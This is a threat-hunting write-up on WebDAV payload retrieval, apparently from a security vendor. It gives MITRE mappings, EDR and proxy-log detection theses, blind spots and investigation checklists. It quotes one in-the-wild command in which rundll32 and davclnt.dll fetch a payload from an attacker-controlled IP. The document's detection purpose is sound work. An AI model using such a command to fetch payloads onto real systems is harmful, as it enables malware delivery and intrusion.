WebDAV payload retrieval

Attack technique

Technique name: WebDAV Payload Retrieval

MITRE ATT&CK

• Tactic: Command and Control, Resource Development
• Technique: Application Layer Protocol: Web Protocols, Stage Capabilities: Upload Malware

Technique description
WebDAV is an extension of the HTTP protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. This way it allows the Web to be viewed as a writeable, collaborative medium rather than just a read-only one. A notable advantage of this protocol for threat actors lies in the fact that connection requests to a WebDAV server are initiated by svchost.exe, breaking the expected process chain and making it harder to spot. The protocol has been associated with various malicious campaigns, and threat actors are using it to transfer their payload and tools to compromised environments.

Insights from threat intelligence
The use of WebDAV servers has become a Malware distribution trend. This method has become popular because it helps attackers blend into legitimate HTTP traffic, with lower chances of it being blocked since it’s initiated by svchost.exe (rather than by their own payload). We’ve seen an increase in attacks where WebDAV-hosted payloads are fetched and executed either with user interaction or programmatically.

In the wild example:
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie 172[.]86.68.194@80 http://172[.]86.68.194/4496

References

• Dissecting new infostealer campaign targeting Mexico
• Beyond file search a novel method
• X post (previously Twitter)

Threat hunting theses breakdown

WebDAV payload retrieval followed by process execution

Relevant Data Sources

• EDR Logs

Thesis explanation
A WebDAV-hosted payload is fetched through the WebDAV protocol and subsequently executed. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis is focused around WebDAV servers that are rarely accessed by the organization.

Blind spots

• Cases where the payload was not executed, or executed more than 5 minutes after its retrieval
• Cases where a frequently contacted domain or IP is being compromised and used to host WebDAV payloads.

Recommended investigation flow

1. Investigate the target WebDAV server:

   Domain:

   • Is it in Umbrella 1M?
   • Is it a baby domain (registered recently)?
   • Which registrar registered it?
   • Does it have a valid certificate?
   • Does the whois information reveal the organization that owns the domain?
   • When was it first accessed by the organization?
   • How frequently is it accessed by the organization?
     
     
     IP:
   • Which ASN does it belong to?
   • Is it hosting?
   • Is it a proxy IP?
   • When was it first accessed by the organization?
   • How frequently is it accessed by the organization?

2. Investigate the payload execution:

• What kind of file is it (binary, script, document, etc.)?
• How was it executed (as a standalone process, run by another process)?
• What operations were initiated by the process (process and file creations, network connections)?
• Is the hash known in VT or seen in public Sandbox reports?
• Was a file written with the same extension to the default WebDAV cache directory?
  • Path: \Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
  • In case of a malicious payload retrieval, the payload can be extracted from this path for further analysis and should be removed from the machine.

WebDAV payload retrieval

Relevant data sources

• Proxy Logs

Thesis explanation
A WebDAV-hosted payload is fetched through an HTTP GET request using the WebDAV protocol (identified by the default WebDAV user agent). This request can be initiated either when a user is tricked into clicking on a WebDAV-hosted payload, or programmatically as part of a prior stage of the attack.

Blind spots
Cases where the WebDAV default user agent is not being used. It is not likely since the request is initiated by the WebClient service, which makes it harder to modify its parameters.

Recommended investigation flow
Investigate the target WebDAV server:

Domain:

• Is it in Umbrella 1M?
• Is it a baby domain (registered recently)?
• Which registrar registered it?
• Does it have a valid certificate?
• Does the whois information reveal the organization that owns the domain?
• When was it first accessed by the organization?
• How frequently is it accessed by the organization?

IP:

• Which ASN does it belong to?
• Is it hosting?
• Is it a proxy IP?
• When was it first accessed by the organization?
• How frequently is it accessed by the organization?

Hunting queries

EDR:

• https://gist.github.com/axon-git/dccbb358a59d521feb0ce976da140ade
• https://github.com/axon-git/threat-hunting-tools/blob/main/InfoStealer%20Campaign%20Targeting%20Mexico/remote_webdav_payload_retrieval.sql

Proxy logs:

• https://gist.github.com/axon-git/306f34481f94396689880bd56948a181